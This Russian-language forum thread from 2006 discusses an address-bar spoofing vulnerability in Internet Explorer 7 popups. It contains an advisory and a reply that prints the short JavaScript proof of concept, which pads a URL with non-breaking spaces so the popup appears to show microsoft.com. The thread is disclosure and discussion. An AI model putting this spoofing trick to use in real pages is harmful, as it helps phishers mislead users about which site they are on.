IPB

Здравствуйте, гость ( Вход | Регистрация )

> Подмена адресной строки в popup окне в Microsoft Internet Explorer 7
Гость_axiz_*
сообщение Oct 25 2006, 12:53
Сообщение #1





Guests
Программа: Microsoft Internet Explorer 7.x
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю произвести спуфинг атаку.
Уязвимость существует из-за того, что злоумышленник может добавить специальные символы к URL, открывающемся во всплывающем окне. В результате, в всплывающем окне будет отображена часть адресной строки, что может позволить злоумышленнику обманом заставить пользователя произвести некоторые действия. Пример:

secunia.com/internet_explorer_7_popup_address_bar_spoofing_test/

URL производителя: microsoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Сообщение отредактировал axiz - Oct 25 2006, 14:02
Вернуться к началу страницы
 
+Цитировать сообщение
 
 Создать новую тему
Ответов
pavel
сообщение Oct 25 2006, 13:15
Сообщение #2


Пользователь
**

Группа: Posters
Сообщений: 116
Регистрация: 22.5.2006
Из: Чебоксары
Пользователь №: 616
Я так понял речь идет об этом:
Цитата
Phishing Filter: I intentionally visited a phishing scam site aimed at Ebay users to test out the phishing filter functionality.

IE7 displayed the actual URL of the spoof site in the address bar and the URL that I thought I was visiting was displayed in a box at the top of the window. To the right of the address bar, a yellow box with a shield and the message "Suspicious Website" appeared.

It worked, but could go unseen. Perhaps an actual alert box or pop-up that would draw more attention would work better?

взято с http://netsecurity.about.com/od/securingwi...p/aaprie7v1.htm

а ваще это там делается с помощью следующего скрипта:
Код
function StartTest()
{
var padding = '';
for ( i=0; i<108; i++)
{
  padding += unescape("%A0");
}
newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
newWindow.moveTo( (screen.width-325) , 0 );
newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}

его смысла я не совсем понял, но в моей опере он сработал также, как и в IE smile.gif
Вернуться к началу страницы
 
+Цитировать сообщение

Сообщений в этой теме
- axiz   Подмена адресной строки в popup окне в Microsoft Internet Explorer 7   Oct 25 2006, 12:53
- - Safus   еще один повод пересесть на оперу или мозилу не м...   Oct 25 2006, 13:11
- - pavel   Я так понял речь идет об этом: ЦитатаPhishing Filt...   Oct 25 2006, 13:15
- - AndrewDragon   ага, к адресу добавился адрес мелкомягких, так оно...   Oct 26 2006, 16:55
- - pavel   Цитата(AndrewDragon @ Oct 26 2006, 17:55)...   Oct 26 2006, 19:51

« Предыдущая тема · Остальное · Следующая тема »
 

ОтветитьСоздать новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 

Режим отображения: Переключить на: Стандартный · Переключить на: Линейный · Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

RSS Текстовая версия Сейчас: 13th October 2025 - 20:50
Форум IP.Board © 2025  IPS, Inc.